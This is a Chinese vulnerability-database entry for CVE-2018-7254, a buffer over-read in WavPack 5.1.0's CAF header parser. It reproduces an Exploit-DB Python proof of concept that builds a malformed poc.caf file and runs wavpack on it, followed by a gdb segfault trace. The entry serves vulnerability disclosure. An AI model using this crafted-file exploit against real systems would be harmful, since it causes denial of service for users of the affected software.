WavPack 缓冲区错误漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124839 漏洞类型 缓冲区错误
发布时间 2018-02-21 更新时间 2019-10-23
CVE编号 CVE-2018-7254 CNNVD-ID CNNVD-201802-799
漏洞平台 Multiple CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/44154
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201802-799
|漏洞详情
WavPack是一套开源的、免费的音频无损压缩软件。 WavPack 5.1.0版本中的cli/caff.c文件的‘ParseCaffHeaderConfig’函数存在缓冲区错误漏洞。远程攻击者可借助恶意构造的CAF文件利用该漏洞造成拒绝服务(缓冲区越边界读取)或造成内存分配错误。
|漏洞EXP
# Exploit title: Wavpack 5.1.0 - Denial of Service
# Date: 20.02.2018
# Exploit Author: r4xis
# https://github.com/r4xis
#
# Vendor Homepage:  http://www.wavpack.com/
# Software Links:   http://www.wavpack.com/downloads.html
#                   https://github.com/dbry/WavPack
#
#
# Version: Wavpack 5.1.0
# Tested on:    Debian 9.3.0 64 bit
#               Windows 7 32 bit and 64 bit
#               Windows 8 64 bit
#
#
# CVE: CVE-2018-7254
# CVE Details:
# https://nvd.nist.gov/vuln/detail/CVE-2018-7254
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
# https://github.com/dbry/WavPack/issues/26


import os

head = "\x63\x61\x66\x66"
version = "\x00\x01"
junk1 = "\x00"*(0xa0-6)
crash = "\x80"
junk2 = "\x00"*100

f=open("poc.caf", 'w')
f.write(head+version+junk1+crash+junk2)
f.close()

os.system("wavpack poc.caf")

'''
Debian gdb output:
Program received signal SIGSEGV, Segmentation fault.
__memmove_sse2_unaligned_erms ()
    at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:333
333	../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
'''
|参考资料

来源:MISC
链接:https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
来源:MISC
链接:https://github.com/dbry/WavPack/commit/8e3fe45a7bac31d9a3b558ae0079e2d92a04799e
来源:MISC
链接:https://github.com/dbry/WavPack/issues/26